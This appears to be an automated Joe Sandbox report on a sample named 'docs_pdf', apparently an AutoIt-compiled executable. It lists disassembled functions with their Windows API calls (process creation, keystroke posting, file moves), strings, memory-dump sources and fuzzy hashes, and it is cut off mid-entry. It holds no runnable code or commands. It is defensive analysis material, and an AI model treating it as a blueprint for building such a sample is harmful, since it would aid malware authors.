                                    Function 00FBFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FBFC06
                                    • OleUninitialize.OLE32(?,00000000), ref: 00FBFCA5
                                    • UnregisterHotKey.USER32(?), ref: 00FBFDFC
                                    • DestroyWindow.USER32(?), ref: 00FF4A00
                                    • FreeLibrary.KERNEL32(?), ref: 00FF4A65
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF4A92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 0f0b7cd9e7afd0448a26bbc89549b0094705744f4bff13bafd3c21ac463f8e14
                                    • Instruction ID: 1c07a10a302d83a000ede2aece2cce1c54e7b1c51b3097dbb2654fab7c36f158
                                    • Opcode Fuzzy Hash: 0f0b7cd9e7afd0448a26bbc89549b0094705744f4bff13bafd3c21ac463f8e14
                                    • Instruction Fuzzy Hash: E3A18171B01212CFCB29EF15C994B7AF764AF04710F1442ADE906AB261CB38ED16EF54
                                    Function 0100A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnumChildWindows.USER32(?,0100AA64), ref: 0100A9A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: a4923b97d492f3d10c702457f75df80441c1c7f88fcec4c4d787c65792850a86
                                    • Instruction ID: fa897727cbd0ffe2dd07792e30e7dc3ec9eaacd43ac1cae6f72fd22aa954d691
                                    • Opcode Fuzzy Hash: a4923b97d492f3d10c702457f75df80441c1c7f88fcec4c4d787c65792850a86
                                    • Instruction Fuzzy Hash: 1D918330B00706EAEB49DF64C881BEDFBB5BF04304F04815AE5DAA7291DF346A59DB90
                                    Function 00FB2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FB2EAE
                                      • Part of subcall function 00FB1DB3: GetClientRect.USER32(?,?), ref: 00FB1DDC
                                      • Part of subcall function 00FB1DB3: GetWindowRect.USER32(?,?), ref: 00FB1E1D
                                      • Part of subcall function 00FB1DB3: ScreenToClient.USER32(?,?), ref: 00FB1E45
                                    • GetDC.USER32 ref: 00FECF82
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FECF95
                                    • SelectObject.GDI32(00000000,00000000), ref: 00FECFA3
                                    • SelectObject.GDI32(00000000,00000000), ref: 00FECFB8
                                    • ReleaseDC.USER32(?,00000000), ref: 00FECFC0
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FED04B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 6d7f22d83097da5e68a6a9ed1a7f4b28f08eb75732b0b749de84a687fd00c8cf
                                    • Instruction ID: 3d9367341f40b8bb80a72b9c0abc9639e75b738c557dbfe10cff30d7797e4d3a
                                    • Opcode Fuzzy Hash: 6d7f22d83097da5e68a6a9ed1a7f4b28f08eb75732b0b749de84a687fd00c8cf
                                    • Instruction Fuzzy Hash: 6871B631900285DFCF218F66C884AEA7BB6FF49360F18426AFD955A159C7358C42FF61
                                    Function 0103C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                      • Part of subcall function 00FB2344: GetCursorPos.USER32(?), ref: 00FB2357
                                      • Part of subcall function 00FB2344: ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0103C2E4
                                    • ImageList_EndDrag.COMCTL32 ref: 0103C2EA
                                    • ReleaseCapture.USER32 ref: 0103C2F0
                                    • SetWindowTextW.USER32(?,00000000), ref: 0103C39A
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0103C3AD
                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0103C48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 1924731296-2107944366
                                    • Opcode ID: 94e407d2926245f34b5e723e29fad66ad8923ff6a9554b3872741e56cb2c14f4
                                    • Instruction ID: 1b79591da394daa5d696f20482c3a8538d0650d4416eadd710abcb59c9b16e69
                                    • Opcode Fuzzy Hash: 94e407d2926245f34b5e723e29fad66ad8923ff6a9554b3872741e56cb2c14f4
                                    • Instruction Fuzzy Hash: 4A51AE70604305AFE714EF24C855FAA7BE9FB88310F00851DF5969B2A1CB7A9944DB52
                                    Function 01028F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0103F910), ref: 0102903D
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0103F910), ref: 01029071
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010291EB
                                    • SysFreeString.OLEAUT32(?), ref: 01029215
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 0564324432c7b57b2f10f59a47f9c9f3164f67f271309c91235d72ac9871e7af
                                    • Instruction ID: ead3dbed686c7ccb82630e544b8130e45be4f45d8245acf21b4bab3ee6bed0c5
                                    • Opcode Fuzzy Hash: 0564324432c7b57b2f10f59a47f9c9f3164f67f271309c91235d72ac9871e7af
                                    • Instruction Fuzzy Hash: ADF13B71A00129EFDF54DF98C888EAEB7B9FF89318F108099F555AB251CB31AE45CB50
                                    Function 0102F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0102F9C9
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102FB5C
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102FB80
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102FBC0
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102FBE2
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0102FD5E
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0102FD90
                                    • CloseHandle.KERNEL32(?), ref: 0102FDBF
                                    • CloseHandle.KERNEL32(?), ref: 0102FE36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 021a636d4641c5b3b1b4a6320017cf562c4791813fc1684a59031af3a3cdf898
                                    • Instruction ID: 35842b8a3957a6d5ebe8784e521316dc8148b1ee3539d498107bf1fc54b3bdb9
                                    • Opcode Fuzzy Hash: 021a636d4641c5b3b1b4a6320017cf562c4791813fc1684a59031af3a3cdf898
                                    • Instruction Fuzzy Hash: 45E1B0316042129FDB15EF28C881B6ABBF5AF84390F18855DF9D98B2A2CB75DC44CF52
                                    Function 01014F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010138D3,?), ref: 010148C7
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010138D3,?), ref: 010148E0
                                      • Part of subcall function 01014CD3: GetFileAttributesW.KERNEL32(?,01013947), ref: 01014CD4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 01014FE2
                                    • _wcscmp.LIBCMT ref: 01014FFC
                                    • MoveFileW.KERNEL32(?,?), ref: 01015017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 10d5091bbdb7151270593e45d837e27d78211715a6153326da9893c69c675185
                                    • Instruction ID: c791e8afc60a11eb7710dd732d4699ab8980835d047fdf644ec9fc55e2dcd02f
                                    • Opcode Fuzzy Hash: 10d5091bbdb7151270593e45d837e27d78211715a6153326da9893c69c675185
                                    • Instruction Fuzzy Hash: 625186B24083859BC761EB94DC819DFB7ECAF85300F04492FB2C9D7155EF79A1888766
                                    Function 010388B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0103896E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 7213c82500681681f757d86d89daf74f3f849564cad472d0ff211d5a555d881d
                                    • Instruction ID: 755db80cc4950a95cc52b91bcdf3456fbde56e791f74c66881ac78e1ae86639c
                                    • Opcode Fuzzy Hash: 7213c82500681681f757d86d89daf74f3f849564cad472d0ff211d5a555d881d
                                    • Instruction Fuzzy Hash: BC51E130A00609BBFF359F28DC85B993BACBB85350F108293F691E62D1C775A980CB41
                                    Function 00FB2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FEC547
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FEC569
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FEC581
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FEC59F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FEC5C0
                                    • DestroyIcon.USER32(00000000), ref: 00FEC5CF
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FEC5EC
                                    • DestroyIcon.USER32(?), ref: 00FEC5FB
                                      • Part of subcall function 0103A71E: DeleteObject.GDI32(00000000), ref: 0103A757
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2819616528-0
                                    • Opcode ID: f0ee693062900784a648847fec7017eb9c79d5a5f1738fe6762c8b7bd8ff833b
                                    • Instruction ID: e40190cb74a3c9fbb1770c17867a2b4e4fdc9f9e4042af3904f7e57f700a470d
                                    • Opcode Fuzzy Hash: f0ee693062900784a648847fec7017eb9c79d5a5f1738fe6762c8b7bd8ff833b
                                    • Instruction Fuzzy Hash: 03516970A00209AFDB24DF26CC45FAA3BA9FB58360F104518F946E7290DB75ED91EF90
                                    Function 01009B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0100AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0100AE77
                                      • Part of subcall function 0100AE57: GetCurrentThreadId.KERNEL32 ref: 0100AE7E
                                      • Part of subcall function 0100AE57: AttachThreadInput.USER32(00000000,?,01009B65,?,00000001), ref: 0100AE85
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009B70
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01009B8D
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 01009B90
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009B99
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01009BB7
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01009BBA
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009BC3
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01009BDA
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01009BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 5ce627ccfb15009a1a8c2132eb93313b9b4308306d21f75da440e6ef55a30cc0
                                    • Instruction ID: 263b912197355eda2759dfe75ce716af1e7a5b0071914917e3fcd8aea76a505b
                                    • Opcode Fuzzy Hash: 5ce627ccfb15009a1a8c2132eb93313b9b4308306d21f75da440e6ef55a30cc0
                                    • Instruction Fuzzy Hash: 5911E571950619BEF6206B70DC49FAA3B1DDB4C755F100415F284AB0D0CAF35C10DBA5
                                    Function 01008E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,01008A84,00000B00,?,?), ref: 01008E0C
                                    • HeapAlloc.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E13
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01008A84,00000B00,?,?), ref: 01008E28
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,01008A84,00000B00,?,?), ref: 01008E30
                                    • DuplicateHandle.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E33
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,01008A84,00000B00,?,?), ref: 01008E43
                                    • GetCurrentProcess.KERNEL32(01008A84,00000000,?,01008A84,00000B00,?,?), ref: 01008E4B
                                    • DuplicateHandle.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E4E
                                    • CreateThread.KERNEL32(00000000,00000000,01008E74,00000000,00000000,00000000), ref: 01008E68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
                                    • Opcode ID: 30199e0620d7751aea0912c7ba1c27ad24948da3665c4c02b63e4f5cb9ee5da0
                                    • Instruction ID: 64dd17eb94e2e1764c65d8d5eed1a2ff289132445361aed4577373be5f8def45
                                    • Opcode Fuzzy Hash: 30199e0620d7751aea0912c7ba1c27ad24948da3665c4c02b63e4f5cb9ee5da0
                                    • Instruction Fuzzy Hash: 6F01BBB5640349BFE720ABA5EC4DF6B3BACEB89711F004411FA45DB195CA759C04DB21
                                    Function 01029428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: c53d59f03d3c9be675550533105fd4c9f46843580634c245c1406d7ab754e61e
                                    • Instruction ID: 3c49842b9d7f597035abb3180cac90bd0728bc236a60bd2c34745caf35ccafe7
                                    • Opcode Fuzzy Hash: c53d59f03d3c9be675550533105fd4c9f46843580634c245c1406d7ab754e61e
                                    • Instruction Fuzzy Hash: 2F91AE71A00239ABDF24DFA5C848FAEBBF8EF49718F008559F595AB241D7749904CFA0
                                    Function 01029A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01007652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?,?,0100799D), ref: 0100766F
                                      • Part of subcall function 01007652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 0100768A
                                      • Part of subcall function 01007652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 01007698
                                      • Part of subcall function 01007652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?), ref: 010076A8
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01029B1B
                                    • _memset.LIBCMT ref: 01029B28
                                    • _memset.LIBCMT ref: 01029C6B
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01029C97
                                    • CoTaskMemFree.OLE32(?), ref: 01029CA2
                                    Strings
                                    • NULL Pointer assignment, xrefs: 01029CF0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: 3d4e6b817f89919854a39fdadb5d6e370fcba7bf8b9b240c5ac028180c824a57
                                    • Instruction ID: c6b8b1af33ca36b7a091a83ffa6c5ae7f51588fc40501acde9cb5156556cc241
                                    • Opcode Fuzzy Hash: 3d4e6b817f89919854a39fdadb5d6e370fcba7bf8b9b240c5ac028180c824a57
                                    • Instruction Fuzzy Hash: 9D914871D00229EBDB10EFA5DC80ADEBBB9FF48710F20415AF559A7281DB359A44CFA0
                                    Function 01036FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01037093
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 010370A7
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010370C1
                                    • _wcscat.LIBCMT ref: 0103711C
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 01037133
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01037161
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
